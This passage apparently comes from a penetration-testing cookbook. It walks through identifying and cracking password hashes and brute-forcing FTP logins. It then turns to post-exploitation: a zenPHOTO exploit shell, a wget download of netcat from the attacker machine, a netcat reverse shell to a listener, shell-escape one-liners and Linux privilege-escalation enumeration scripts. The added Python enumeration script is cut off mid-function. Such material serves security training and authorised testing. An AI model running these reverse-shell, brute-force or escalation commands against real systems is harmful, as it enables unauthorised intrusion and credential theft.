Johnny Bravo! 

Using cewl 

Generating word list with crunch 


Introduction 


Weak passwords are one of the most common ways in which corporate environments are compromised. Many 
people use weak passwords that can be brute forced, so that the plaintext can be recovered. In this chapter, we 
will talk about different ways in which we can crack a password hash obtained during a pentest activity 
performed on a web app, a network, or elsewhere. 


Identifying different types of hash in the wild! 


Hashes are generated by one-way mathematical algorithms, which means they cannot be reversed. The 
only way to break them is to brute force them, that is, to guess candidate inputs until one produces the same 
hash. In this recipe, you will learn how to identify some of the different types of hashes. 


How to do it... 


Following are the types of hashes. 


MD5 


This is the most common type of hash. MD stands for Message Digest algorithm. These hashes can be 
identified using the following observation: 


• They are hexadecimal 
• They are 32 characters in length and of 128 bits, for example, 21232f297a57a5a743894a0e4a801fc3 


MySQL less than v4.1 


We may come across such hashes while extracting data from SQL Injection. These hashes can be 
identified using the following observation: 


• They are hexadecimal as well 
• They are 16 characters in length and of 64 bits, for example, 606727496645bcba 


MD5 (WordPress) 


This is used on websites made via WordPress. These hashes can be identified using the following 
observation: 


• They begin with $P$ 
• They contain alphanumeric characters 
• They are 34 characters in length and of 64 bits, for example, $P$oqcusro7ob2qnmbmscRh3mMoi6ehJZR 


MySQL 5 


This is used in newer versions of MySQL to store credentials. These hashes can be identified using the 
following observation: 


• They are all CAPS 
• They always start with an asterisk 
• They are 41 characters in length, for example, *4ACFE3202A5FF5CF467898FC58AAB1D615029441 


Base64 encoding 


Base64 is easy to identify. The conversion is done by encoding eight octets into four characters. The 
easiest way to check a Base64 is as follows: 


• Verify that the length is a multiple of 4 characters 
• Verify that every character is in the set A-Z, a-z, 0-9, +, / except for the padding at the end, which is 0, 1, 
or 2 = characters, for example, ywss1enhcmshbcBwhGvhesvyzs4= 
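The observations from this recipe written as checks, as an added example that is not part of the book. The MD5 and MySQL values are the recipe's own examples; the WordPress and Base64 values are constructed for the demonstration, and the Base64 check goes one step further than the text by decoding the value to see whether it is text at all.

```python
import base64
import binascii
import re

# Constructed sample inputs (the WordPress value is made up to fit the $P$
# format; the Base64 value is the encoding of "admin:password").
SAMPLES = {
    "md5":       "21232f297a57a5a743894a0e4a801fc3",
    "mysql_old": "606727496645bcba",
    "wordpress": "$P$BhxQ9XmK1vJ2sL3tN4uP5wR6yZ7aC8d",
    "mysql5":    "*4ACFE3202A5FF5CF467898FC58AAB1D615029441",
    "base64":    "YWRtaW46cGFzc3dvcmQ=",
}


def base64_kind(value):
    """None if value is not valid Base64, 'text' if it decodes to printable
    ASCII, 'binary' otherwise.  Base64 maps each 3-byte group to 4 output
    characters, so the length is a multiple of 4 with at most two '=' pads."""
    if not value or len(value) % 4:
        return None
    if not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value):
        return None
    try:
        raw = base64.b64decode(value, validate=True)
    except binascii.Error:
        return None
    if all(32 <= b < 127 or b in (9, 10, 13) for b in raw):
        return "text"
    return "binary"


def identify(value):
    """Candidate formats for value, following the recipe's observations."""
    v = value.strip()
    found = []
    if re.fullmatch(r"[0-9a-fA-F]{32}", v):
        found.append("MD5")                 # 32 hex characters = 128 bits
    if re.fullmatch(r"[0-9a-fA-F]{16}", v):
        found.append("MySQL < 4.1")         # 16 hex characters = 64 bits
    if re.fullmatch(r"\$P\$[A-Za-z0-9./]{31}", v):
        found.append("MD5 (WordPress)")     # "$P$" plus 31 characters = 34
    if re.fullmatch(r"\*[0-9A-F]{40}", v):
        found.append("MySQL 5")             # "*" plus 40 upper-case hex = 41
    kind = base64_kind(v)
    if kind == "text":
        found.append("Base64 (decodes to text, not a hash)")
    elif kind == "binary":
        # Any 16- or 32-character hex string also passes the Base64 length
        # and alphabet tests, so the Base64 rule alone is never decisive.
        found.append("Base64 (decodes to non-text bytes)")
    return found


if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        print(f"{name:10} {sample:45} -> {identify(sample)}")
```

Note that both hex examples are also reported as syntactically valid Base64; the decode step is what separates real encoded text from a hex digest.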


There's more... 


Here's an article to learn more about different types of hashes: 


http://www.101hacker.com/2010/12/hashes-and-seeds-know-basics.html 


Using hash-identifier 


In the preceding recipe, you learned how to identify some common hash types. But there are other hashes 
as well, and in this recipe, you will learn how to identify other hashes we find during our pentesting 
project. 


How to do it... 


The following steps demonstrate the use of hash-identifier: 


1. Kali comes preinstalled with a tool called hash identifier. To start the tool, we use the following 
command: 


    hash-identifier 


The following screenshot shows the output of the preceding command: 


    root@kali:~# hash-identifier 
    [the tool's banner (by Zion3R, www.Blackploit.com, Root@Blackploit.com), followed by the HASH: prompt] 





2. Now all we need to do is paste the hash we found here, and it will show us the type: 
    HASH: D033E22AE348AEB5660FC2140AEC35850C4DA997 

    Possible Hashs: 
    [+] SHA-1 
    [+] MySQL5 - SHA-1(SHA-1($pass)) 

    Least Possible Hashs: 
    [+] Tiger-160 
    [+] Haval-160 
    [+] RipeMD-160 
    [+] SHA-1(HMAC) 





Cracking with patator 


Sometimes, it is possible we have the usernames but we want to try brute forcing the password for it. 
Patator is an amazing tool that allows us to brute force multiple types of logins and even ZIP passwords. 
In this recipe, we will see how to use patator to perform a brute force attack. 


How to do it... 


Following are the steps to use patator: 


1. To see all the options, we use the following command: 
    patator -h 
The following screenshot shows the output of the preceding command: 


    root@kali:~# patator -h 
    Patator v0.5 (http://code.google.com/p/patator/) 
    Usage: patator.py module --help 

    Available modules: 
      + ftp_login     : Brute-force FTP 
      + ssh_login     : Brute-force SSH 
      + telnet_login  : Brute-force Telnet 
      + smtp_login    : Brute-force SMTP 
      + smtp_vrfy     : Enumerate valid users using SMTP VRFY 
      + smtp_rcpt     : Enumerate valid users using SMTP RCPT 
      + finger_lookup : Enumerate valid users using Finger 
      + http_fuzz     : Brute-force HTTP 
      + pop_login     : Brute-force POP3 
      + pop_passd     : Brute-force poppassd (http://netwin 
      + imap_login    : Brute-force IMAP4 
      + ldap_login    : Brute-force LDAP 
      + smb_login     : Brute-force SMB 
      + smb_lookupsid : Brute-force SMB SID-lookup 


2. Let's try to brute force an FTP login: 


    patator ftp_login 


The following screenshot shows the output of the preceding command: 


    root@kali:~# patator ftp_login 
    Patator v0.5 (http://code.google.com/p/patator/) 
    Usage: ftp_login <module-options ...> [global-options ...] 

    Examples: 
      ftp_login host=10.0.0.1 user=FILE0 password=FILE1 0=logins.txt 1=passwor 
        -x ignore:mesg='Login incorrect.' -x ignore,reset,retry:code=500 

    Module options: 
      host       : target host 
      port       : target port [21] 
      user       : usernames to test 
      password   : passwords to test 
      tls        : use TLS [0|1] 
      timeout    : seconds to wait for a response [10] 
      persistent : use persistent connections [1|0] 





3. We can now set the host, user file, and password file and run the module: 


    patator ftp_login host=192.168.36.16 user=ftp password=ftp 


The following screenshot shows the output of the preceding command: 


    root@kali:~# patator ftp_login host=192.168.36.16 user=ftp password=ftp 
    Starting Patator v0.5 (http://code.google.com/p/patator/) ... 
    [INFO lines from the ftp_login module follow, one per attempt, until the login succeeds and the module stops] 


4. We can see that access has been granted and the module has stopped. 


Cracking hashes online 


Often when we come across hashes while pentesting, it's a good idea to check the hash online: whether it 
has been already cracked or not. In this recipe, you will learn about some of the cool websites that 
provide the hash cracking service. 


How to do it... 


Let's take a look at some of the services that can crack hashes online. 


Hashkiller 


The following steps demonstrate the use of Hashkiller: 


1. Hashkiller is a great service where we can submit our hashes, and if it has already been cracked in 
the past, it will show us the plaintext: 


[Screenshot: the Hashkiller home page (https://hashkiller.co.uk) with the menu Home, Forums, Decrypter/Cracker, Database info, HashMinMax, WPA Crack, Lists and Competition. The page states that HashKiller's purpose is to serve as a meeting place for computer hobbyists, security researchers and penetration testers demonstrating the weakness of using hash based storage / authentication, and lists the last 50 successful MD5 decryptions / founds, by number and type (mostly MySQL4.1/MySQL5).]





2. The process is simple; we simply choose the option on the website where it says Decrypter / 
Cracker and then we click on the type of hash we want to crack: 


[Screenshot: the Decrypter / Cracker menu with the entries MD5 Decrypter, NTLM Decrypter, SHA1 Decrypter and Submit Founds.]





3. On the page that opens, we paste our hash, fill in the CAPTCHA, and then click on Submit: 


[Screenshot: the MD5 Decrypter page (https://hashkiller.co.uk/md5-decrypter.aspx): a text box for the MD5 hashes to be converted into text / cracked / decrypted, a note that in the results the password is after the : character and the MD5 hash before it, and the pasted hash.]





4. If the hash exists, it will show us the plaintext; else, we will see a message saying Failed to find any 
hashes!: 


[Screenshot: the same page (https://hashkiller.co.uk/md5-decrypter.aspx) after submission, with the result shown below the form in the hash:password format.]





Crackstation 


Crackstation is a free service that supports MD2, MD5, NTLM, and SHA1 cracking. It uses its own word 
list and lookup tables to effectively perform a plaintext search of a hash from its database: 


1. We visit the website https://crackstation.net/: 


[Screenshot: the CrackStation home page (https://crackstation.net) with the Free Password Hash Cracker form: "Enter up to 20 non-salted hashes, one per line", a note listing the supported types (LM, NTLM, md2, md4, md5, md5(md5_hex), md5-half, sha1, sha224, sha256, sha384, sha512, ripeMD160, whirlpool, MySQL 4.1+ (sha1(sha1_bin)), QubesV3.1BackupDefaults) and a link to download CrackStation's wordlist.]


2. We paste the hash that we want to crack and fill in the CAPTCHA: 


[Screenshot: the same form with the hash 70F63D696B87AD024E2062F710599A97 pasted in, the CAPTCHA filled in, and the Crack Hashes button.]


3. We will see the plaintext if the hash is found; else, we see a message that says the hash was not 
found: 


[Screenshot: the result table with the columns Hash, Type and Result. Colour codes: green for an exact match, yellow for a partial match, red for not found.]


4. Crackstation also provides a download link for its password list and lookup tables if we want to use 
them for offline cracking of passwords with hashcat or similar tools: https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm: 


[Screenshot: the wordlist download page (https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm). A note says that a torrent client such as Transmission (Linux and Mac) or uTorrent is needed for the torrents. The full list is offered as a Torrent (Fast) and an HTTP Mirror (Slow): GZIP-compressed (level 9), 4.2 GiB compressed, 15 GiB uncompressed, with MD5, SHA1 and SHA256 checksums for crackstation.txt.gz. A smaller wordlist (human passwords only), created after requests for a list containing just the "real human" passwords leaked from various website databases, holds about 64 million passwords: GZIP-compressed, 247 MiB compressed, 684 MiB uncompressed, again as Torrent (Fast) and HTTP Mirror (Slow).]


OnlineHashCrack 


This is a freemium service and one of my favorites. It supports OSX, MD4, MD5, NTLM, WPA(2), and 
the brute forcing of password-protected Word, Excel, and PPT documents as well. Passwords of up to eight 
characters are revealed for free; beyond that, it charges a small fee to reveal a password that has been 
cracked successfully: 


1. We visit the website http://onlinehashcrack.com/: 


[Screenshot: the Online Hash Crack home page (https://www.onlinehashcrack.com) with its HASHES, WIFI and Office sections, describing itself as a professional password recovery service assisting pentesters and security experts.]


2. Here, we can submit our hashes or a .cap capture file for cracking, along with the email address where we want to 
receive our notification: 


[Screenshot: the two submission forms. "Password/Hashes crack": enter your hashes (up to 10), a link to the hash acceptance list, an EMAIL field and a SUBMIT button. "Wifi WPA(2) crack": upload your capture file (.cap, .pcap or .hccap; max size 10 MB; the first ESSID is selected automatically), an EMAIL field and a SUBMIT button.]


3. On the unique link we receive in our email, we can then see the status of all the hashes that were 
cracked or not found on the website: 





[Screenshot: the status page reached from the emailed link, listing each submitted hash with its submission date and result, for example the 32-character hash 00D3CE11561C36889060663B629F8D34 submitted on 2016-01-13 and a WordPress $P$ hash submitted on 2015-11-23, with the HASHES, WIFI, OFFICE and HOW TO? tabs above.]








Playing with John the ripper 


Websites and online services may not be always available and it is also possible that those websites may 
not have the plaintext of the hash we have found. In such cases, we can use different offline tools that are 
available to crack the hashes. 


Let's assume we now have the hash and we have identified what type it is. In this recipe, we will see how 
to crack hashes with John the ripper. John is fast and supports various cracking modes. It also has the 
ability to auto-detect the hash type. 


How to do it... 


To learn about John the Ripper, follow the given steps: 


1. We can see the full list of features using the help (-h) switch: 
    john -h 
The following screenshot shows the output of the preceding command: 


    root@kali:~# john -h 
    John the Ripper password cracker, version 1.8.0.6-jumbo-1-bleeding_omp [linux-...] 
    Copyright (c) 1996-2015 by Solar Designer and others 
    Homepage: http://www.openwall.com/john/ 

    Usage: john [OPTIONS] [PASSWORD-FILES] 
    [the option list follows: --single, --wordlist=FILE --stdin, --pipe, --loopback[=FILE], 
     --dupe-suppression, --encoding=NAME (e.g. UTF-8, ISO-8859-1; see also --list=hidden-options), 
     --rules[=SECTION], --incremental[=MODE], --mask=MASK, --markov[=OPTIONS], --external=MODE, 
     --stdout[=LENGTH], --restore[=NAME], ...] 





2. To crack the password, we use the following command: 


    john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt /root/demo_hash.txt 


3. We will see that the password has been cracked successfully! 


    root@kali:~# john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt /root/demo_hash.txt 
    Using default input encoding: UTF-8 
    Loaded 1 password hash (Raw-MD5 [MD5 32/32]) 
    Press 'q' or Ctrl-C to abort, almost any other key for status 
    [cracked password]     (?) 
    1g 0:00:00:00 DONE (2017-02-20 01:29) 8.333g/s 165158p/s 165158c/s 
    Use the "--show" option to display all of the cracked passwords reliably 
    Session completed 


There's more... 


For more information you can refer to the following articles: 


• http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats 


Johnny Bravo! 


Johnny is a GUI client for John. Since it adds a UI, it becomes much easier to use. 


How to do it... 


To learn about Johnny, follow the given steps: 


1. You have learned to use John in our previous recipe. We will start Johnny using the following 
command: 


    johnny 


The following screenshot shows the output of the preceding command: 


[Screenshot: the Johnny main window with the File, Attack and Passwords menus, the Open Passwd File and Copy toolbar buttons, and the Passwords, Options, Statistics, Settings and Output tabs.]


2. We load our password file by clicking on the Open Passwd File option. Our file is loaded: 


[Screenshot: the Passwords tab with the columns User, Password, Hash and GECOS, listing the loaded hash 21232f297...]


3. Now we go to Options and choose the type of attack we want to perform: 


[Screenshot: the Options tab. Mode selection offers Default behaviour, "Single crack" mode, Wordlist mode, "Incremental" mode and External mode. Wordlist mode is selected; the tab explains that wordlist mode uses data from a wordlist file and that rules from the "Wordlist" section can be applied to mangle words. Wordlist file: /usr/share/wordlists/rockyou.txt (with a Browse button), a "Use rules" checkbox, and a field for the external mode filter name.]


4. We choose the Format of the hash: 


[Screenshot: General options with Format set to md5, above the Mode selection and settings panel (Default behaviour).]


5. Once it is done, we click on Start Attack, and we should see our password when it's cracked. 


Using cewl 


cewl is a Ruby-based crawler that crawls a URL and collects words that can be used for password 
attacks. In this recipe, we will look at how to use it to our advantage. 


How to do it... 


Following are the steps for using cewl: 


1. To view all the options of cewl, we use this command: 


    cewl -h 


The following screenshot shows the output of the preceding command: 


    root@kali:~# cewl -h 
    CeWL 5.1 Robin Wood (robin@digi.ninja) (http://digi.ninja) 

    Usage: cewl [OPTION] ... URL 
        --help, -h: show help 
        --keep, -k: keep the downloaded file 
        --depth x, -d x: depth to spider to, default 2 
        --min_word_length, -m: minimum word length, default 3 
        --offsite, -o: let the spider visit other sites 
        --write, -w file: write the output to the file 
        --ua, -u user-agent: useragent to send 
        --no-words, -n: don't output the wordlist 
        --meta, -a include meta data 
        --meta_file file: output file for meta data 
        --email, -e include email addresses 
        --email_file file: output file for email addresses 
        --meta-temp-dir directory: the temporary directory used by exiftool when pa 
        --count, -c: show the count for each word found 





2. To crawl a website, we use this command: 


    cewl -d 2 http://192.168.36.16/forum/ 
The following screenshot shows the output of the preceding command: 


    root@kali:~# cewl -d 2 http://192.168.36.16/forum/ 
    CeWL 5.1 Robin Wood (robin@digi.ninja) (http://digi.ninja) 





3. We will see a list of interesting keywords, one per line, that can be used to build our own dictionary for 
password attacks: 







Generating word list with crunch 


Crunch is a word list generator. It uses permutations and combinations to generate all possible 
combinations of the supplied character set. 


How to do it... 


To learn about Crunch, follow the given steps: 


1. Crunch is preinstalled with Kali, and we can launch it with this command: 
    crunch -h 


    root@kali:~# crunch -h 
    crunch version 3.6 

    Crunch can create a wordlist based on criteria you specify. The output 
    [description continues] 

    Usage: crunch <min> <max> [options] 
    where min and max are numbers 

    Please refer to the man page for instructions and examples on how to use crunch 


2. As we can see, it is easy to use. To generate a password list with a minimum and maximum length of 
two characters, containing only the characters abcdef, we can use the following command: 


    crunch 2 2 abcdef 


We can see that the word list has been generated: 


    root@kali:~# crunch 2 2 abcdef 
    Crunch will now generate the following amount of data: 108 bytes 
    0 MB 
    0 GB 
    0 TB 
    0 PB 





3. To save it in a file, we can use the -o switch. Crunch also ships with a list of predefined 
character sets. It can be found at /usr/share/crunch/charset.lst. 


4. To use a charset from that file, we use the -f switch: 


    crunch 2 2 -f /usr/share/crunch/charset.lst lalpha 


The following screenshot shows the output of the preceding command: 


    # charset configuration file for winrtgen v1.2 by Massimiliano Montoro (mao@oxid.it) 
    # compatible with rainbowcrack 1.1 and later by Zhu Shuanglei <shuanglei@hotmail.com> 

    hex-lower                     = [0123456789abcdef] 
    hex-upper                     = [0123456789ABCDEF] 
    numeric                       = [0123456789] 
    numeric-space                 = [0123456789 ] 
    symbols14                     = [!@#$%^&*()-_+=] 
    symbols14-space               = [!@#$%^&*()-_+= ] 
    symbols-all                   = [!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/] 
    symbols-all-space             = [!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ] 
    ualpha                        = [ABCDEFGHIJKLMNOPQRSTUVWXYZ] 
    ualpha-space                  = [ABCDEFGHIJKLMNOPQRSTUVWXYZ ] 
    ualpha-numeric                = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789] 
    ualpha-numeric-space          = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ] 
    ualpha-numeric-symbol14       = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=] 
    ualpha-numeric-symbol14-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+= ] 
    ualpha-numeric-all            = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/] 
    ualpha-numeric-all-space      = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ] 
    [the file continues with the lalpha, mixalpha and other character sets] 


5. This will generate a list with a minimum and maximum length of 2, containing lowercase 
letters. Crunch also has a -t switch, which can be used to create a word list of a specific pattern: 

    @: This will insert lowercase characters 

    ,: This will insert uppercase characters 

    %: This will insert numbers 

    ^: This will insert symbols 

6. The -b switch can be used to specify the size of the file you want to create: 


[Screenshot: running crunch 10 10 -t @@packt,,% -b 1mib -o START. Crunch prints the amount of data and the number of lines it will generate, followed by progress messages such as "2% completed generating output" and "4% completed generating output".]


7. Let's try to create a list with a specific pattern and of 1 MB in size: 


    crunch 10 10 -t @@packt,,% -b 1mib -o START 


8. Once it's done, we will see a list of text files created with the pattern in the same folder: 


[Screenshot: the directory listing. Each file is named after the first and last candidate it contains, for example ubpacktTM5-uppacktWC9.txt, uppacktWD0-vdpacktYT4.txt, vdpacktYT5-vspacktBJ9.txt and vspacktBK0-wgpacktEA4.txt.]


9. The -z flag can be used to create a word list and save it in a compressed file. The compression is 
done on the fly: 


    crunch 10 10 -t @@packt,,% -b 1mib -o START -z gzip 


The following screenshot shows the output of the preceding command: 


[Screenshot: the same directory listing with the -z gzip option, where each chunk is now a .txt.gz file, for example uppacktWD0-vdpacktYT4.txt.gz.]
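The candidate space behind the commands in this recipe, as an added example that is not part of the book or of crunch itself: it reproduces the per-position character sets of a -t pattern and the plain charset form so that the number of lines, the output size and the number of -b chunks can be estimated before a list is generated. The symbol set used for ^ is a constructed placeholder, and the chunk count is an approximation of what -b produces.

```python
import itertools
import math
import string

# crunch's -t placeholders, as listed in this recipe.  The symbol set for "^"
# is an assumed placeholder; crunch's own default may differ.
PLACEHOLDERS = {
    "@": string.ascii_lowercase,   # lowercase characters
    ",": string.ascii_uppercase,   # uppercase characters
    "%": string.digits,            # numbers
    "^": "!@#$%^&*()-_+=",         # symbols (assumed set)
}


def sets_for_pattern(pattern):
    """One character set per position: placeholders expand, any other
    character is literal, as in crunch 10 10 -t @@packt,,%."""
    return [PLACEHOLDERS.get(ch, ch) for ch in pattern]


def count_pattern(pattern):
    """Lines and bytes crunch <n> <n> -t <pattern> writes: one candidate per
    line, each followed by a newline."""
    sets = sets_for_pattern(pattern)
    lines = math.prod(len(s) for s in sets)
    return lines, lines * (len(sets) + 1)


def count_charset(min_len, max_len, charset):
    """Lines and bytes for crunch <min> <max> <charset>: every length from
    min_len to max_len over the whole character set."""
    lines = byte_total = 0
    for length in range(min_len, max_len + 1):
        n = len(charset) ** length
        lines += n
        byte_total += n * (length + 1)
    return lines, byte_total


def chunks_for(byte_total, chunk_bytes=1024 * 1024):
    """Approximate number of files crunch -b <size> -o START splits into
    (crunch cuts on line boundaries, so the real count can differ by one)."""
    return math.ceil(byte_total / chunk_bytes)


def candidates(pattern, limit=None):
    """Yield candidates in crunch's order: the last position varies fastest."""
    product = itertools.product(*sets_for_pattern(pattern))
    for combo in itertools.islice(product, limit):
        yield "".join(combo)


if __name__ == "__main__":
    # crunch 2 2 abcdef: 36 two-character words, 108 bytes, as in step 2
    print(count_charset(2, 2, "abcdef"))
    # crunch 10 10 -t @@packt,,% -b 1mib: 26*26*26*26*10 candidates
    lines, total = count_pattern("@@packt,,%")
    print(lines, total, chunks_for(total))
    print(list(candidates("@@packt,,%", 5)))
```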





Have Shell Now What? 


In this chapter, we will cover the following recipes: 


Spawning a TTY shell 

Looking for weakness 

Horizontal escalation 

Vertical escalation 

Node hopping: pivoting 

Privilege escalation on Windows 
PowerSploit 

Pulling plaintext passes with mimikatz 
Dumping other saved passwords from the machine 
Pivoting 

Backdooring executables for persistence 


Introduction 


Privilege escalation, as described on Wikipedia, is the act of exploiting a bug, design flaw, or 
configuration oversight in an operating system or software application to gain elevated access to 
resources that are normally protected from an application or user. This results in unauthorized 
access to resources. Two types of privilege escalation are possible: 


• Horizontal: This occurs in conditions where we are able to execute commands or functions that 
were not originally intended for the user access we currently have 

• Vertical: This kind of exploitation occurs when we are able to escalate our privileges to a higher 
user level, for example, getting root on the system 


In this chapter, you will learn the different ways of escalating our privileges on Linux and Windows 
systems as well as gaining access to the internal network. 


Spawning a TTY Shell 


We have covered the different types of privilege escalation. Now let's look at some examples of how to get a 
TTY shell on a system. A TTY provides a simple text environment that allows us to type commands and 
see their output. 


How to do it... 


1. Let's look at the following example, where we have a web application running zenPHOTO: 


[Screenshot: the zenPHOTO login page, with a Password field, a CAPTCHA to be entered in place of the password to request a password reset, and Login and Reset buttons.]


2. A public exploit exists for this zenPHOTO version, which gives us access to the system through a limited shell: 


    root@kali:~# php zenphoto.php 192.168.1.150 /zenphoto/ 
    [the exploit lists the application's PHP files (class-auth.php, class-file.php, class-history.php, 
     class-image.php, class-manager.php, class-pagination.php, class-search.php, class-session.php, 
     class-sessionaction.php, class-upload.php, config.base.php, config.php, config.tinymce.php, 
     functions.base.php, ...) and then drops to its own prompt] 
    zenphoto-shell# 


3. Since this is a limited shell, we try to escape it and get a reverse connection by first uploading netcat 
on the system and then using netcat to gain a backconnect: 


    wget x.x.x.x/netcat -O /tmp/netcat 


    zenphoto-shell# wget 192.168.1.148/netcat -O /tmp/netcat 

    zenphoto-shell# ls /tmp 
    hsperfdata_jenkins 
    hsperfdata_tomcat7 
    jetty-0.0.0.0-9000-w... 
    [the listing continues with the uploaded netcat binary and a .jar file] 





4. Now we can backconnect using the following command: 


    netcat <our IP> <port number> -e /bin/bash 





5. Looking at our Terminal window, where we had our listener setup, we will see a successful 
connection: 


    nc -lnvp <port number> 


    listening on [any] 443 ... 
    192.168.1.150: inverse host lookup failed: Unknown host 
    connect to [192.168.1.148] from (UNKNOWN) [192.168.1.150] 36128 
    id 
    uid=33(www-data) gid=33(www-data) groups=33(www-data) 





Let's get a more stable TTY shell; assuming it's a Linux system, we already have Python installed on it and 
we can get a shell using this: 


    python -c 'import pty; pty.spawn("/bin/sh")' 





    www-data@canyoupwnme:/var/www$ 


We now have a much better way to execute commands. Sometimes, we may find ourselves in a situation in 
which the shell we gain access to via ssh or another method is a limited shell. 


One very famous limited shell is lshell, which allows us to run only a few commands, such as echo, ls, help, 
and so on. Escaping lshell is easy, as all we have to do is type this: 

    echo os.system('/bin/bash') 

And we have access to a command shell with no more limits. 

[Screenshot: a shell-spawning cheat sheet listing the following one-liners] 

    python -c 'import pty; pty.spawn("/bin/sh")' 
    echo os.system('/bin/bash') 
    /bin/sh -i 
    perl -e 'exec "/bin/sh";' 
    perl: exec "/bin/sh"; 


There's more... 


There are various other ways to spawn a TTY shell using Ruby, Perl, and so on. These can be seen at 
http://netsec.ws/?p=337. 


Looking for weakness 


Now that we have a stable shell, we need to look for vulnerabilities, misconfigurations, or anything that 
will help us in escalating privileges on the system. In this recipe, we will look at some of the ways in 
which privileges can be escalated to get the root of the system. 


How to do it... 


The basic step I would recommend to all of you once we have a shell on a server is to do as much 
enumeration as possible: the more we know, the better our chances of escalating privileges on the 
system. 


The key steps to escalating privileges on a system, as listed by g0tmi1k, are as follows: 


Collect: Enumeration, more enumeration, and some more enumeration. 

Process: Sort through data, analyze, and prioritize. 

Search: Know what to search for and where to find the exploit code. 

Adapt: Customize the exploit so it fits. Not every exploit works for every system out of the box. 
Try: Get ready for (lots of) trial and error. 


We will look at some of the most common scripts available on the internet, which makes our job easier by 
printing out whatever we need in a formatted manner. 


The first one is LinEnum, a shell script created by rebootuser. It performs over 65 checks and 
shows us everything we need to start with: 


    Example: ./LinEnum.sh -k keyword -r report -e /tmp/ -t 

    OPTIONS: 
    -k  Enter keyword 
    -e  Enter export location 
    -t  Include thorough (lengthy) tests 
    -r  Enter report name 
    -h  Displays this help text 


Seeing the source code, we will see that it will display information such as kernel version, user info, 
world-writable directories, and so on: 


    #basic kernel info 
    unameinfo=`uname -a 2>/dev/null` 
    if [ "$unameinfo" ]; then 
      echo -e "\e[00;31mKernel information:\e[00m\n$unameinfo" |tee -a $report 2>/dev/null 
      echo -e "\n" |tee -a $report 2>/dev/null 
    else 
      : 
    fi 

    procver=`cat /proc/version 2>/dev/null` 
    if [ "$procver" ]; then 
      echo -e "\e[00;31mKernel information (continued):\e[00m\n$procver" |tee -a $report 2>/dev/null 
      echo -e "\n" |tee -a $report 2>/dev/null 
    else 
      : 
    fi 

    #search all *-release files for version info 
    [the script continues] 


The next script we can use is Linuxprivchecker. It is made in Python. This script also suggests privilege 
escalation exploits that can be used on the system: 


    # Networking Info 
    print "[*] GETTING NETWORKING INFO...\n" 

    netInfo = {"NETINFO":{"cmd":"/sbin/ifconfig -a", "msg":"Interfaces", "results":results}, 
               "ROUTE":{"cmd":"route", "msg":"Route", "results":results}, 
               "NETSTAT":{"cmd":"netstat -antup | grep -v 'TIME_WAIT'", "msg":"Netstat", "results":results} 
              } 

    netInfo = execCmd(netInfo) 
    printResults(netInfo) 

    # File System Info 
    print "[*] GETTING FILESYSTEM INFO...\n" 

    driveInfo = {"MOUNT":{"cmd":"mount","msg":"Mount results", "results":results}, 
                 "FSTAB":{"cmd":"cat /etc/fstab 2>/dev/null", "msg":"fstab entries", "results":results} 
                } 


These scripts are easy to find on Google; more information about them, and the manual commands we can 
run to do the job ourselves, can be found at http://netsec.ws/?p=309 and on g0tmi1k's blog at 
https://blog.g0tmi1k.com. 





One more great script was created by Arr0way (https://twitter.com/Arr0way). He made it available on his blog at 
https://highon.coffee/blog/linux-local-enumeration-script/. We can read the source code on the blog to check 
everything the script does: 


echo -e "$BLUE### $RED /etc/fstab File Contents" 
printf '%*s\n' "${COLUMNS:-$(tput cols)}" '' | tr ' ' '-' 
cat /etc/fstab 
printf '%*s\n' "${COLUMNS:-$(tput cols)}" '' | tr ' ' '-' 
echo -e "\n" 
echo -e "$BLUE### $RED /etc/passwd File Contents" 




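The checks these scripts run are easy to reproduce in a few dozen lines, which matters when the target has no curl or wget and you have to paste something in over a reverse shell. The following is an added example written for this page, not code from LinEnum, linuxprivchecker or Arr0way's script: it prints the kernel release, lists setuid/setgid binaries (flagging ones outside an assumed baseline of the usual suspects), and finds world-writable directories that lack the sticky bit, in the same sectioned style. The EXPECTED_SUID set is an assumption to adjust for the target distribution.

```python
#!/usr/bin/env python3
"""A few of the checks LinEnum and linuxprivchecker run, in plain Python 3.

Added example for this page; not code from LinEnum, linuxprivchecker or the
highon.coffee script. EXPECTED_SUID is an assumed baseline, not exhaustive.
"""
import os
import platform
import stat

# setuid binaries that are normal on most distributions; anything else that
# turns up deserves a closer look (assumed baseline, extend per distro).
EXPECTED_SUID = {
    "su", "sudo", "passwd", "chsh", "chfn", "gpasswd", "newgrp", "mount",
    "umount", "ping", "ping6", "pkexec", "fusermount", "fusermount3",
}


def kernel_info():
    """Equivalent of LinEnum's 'basic kernel info' section."""
    return {"release": platform.release(), "machine": platform.machine()}


def find_suid(dirs=("/usr/bin", "/usr/sbin", "/bin", "/sbin", "/usr/local/bin")):
    """Regular files with the setuid or setgid bit under dirs.

    'unusual' is True for names outside EXPECTED_SUID. Merged-/usr layouts,
    where /bin is a symlink to /usr/bin, are de-duplicated via realpath.
    """
    seen_dirs, found = set(), []
    for d in dirs:
        real = os.path.realpath(d)
        if real in seen_dirs or not os.path.isdir(real):
            continue
        seen_dirs.add(real)
        for name in os.listdir(real):
            path = os.path.join(real, name)
            try:
                st = os.lstat(path)          # lstat: never follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            setuid = bool(st.st_mode & stat.S_ISUID)
            setgid = bool(st.st_mode & stat.S_ISGID)
            if setuid or setgid:
                found.append({"path": path, "setuid": setuid, "setgid": setgid,
                              "owner_uid": st.st_uid,
                              "unusual": name not in EXPECTED_SUID})
    return sorted(found, key=lambda f: f["path"])


def is_world_writable(path):
    """True if path exists and 'others' may write to it (o+w)."""
    try:
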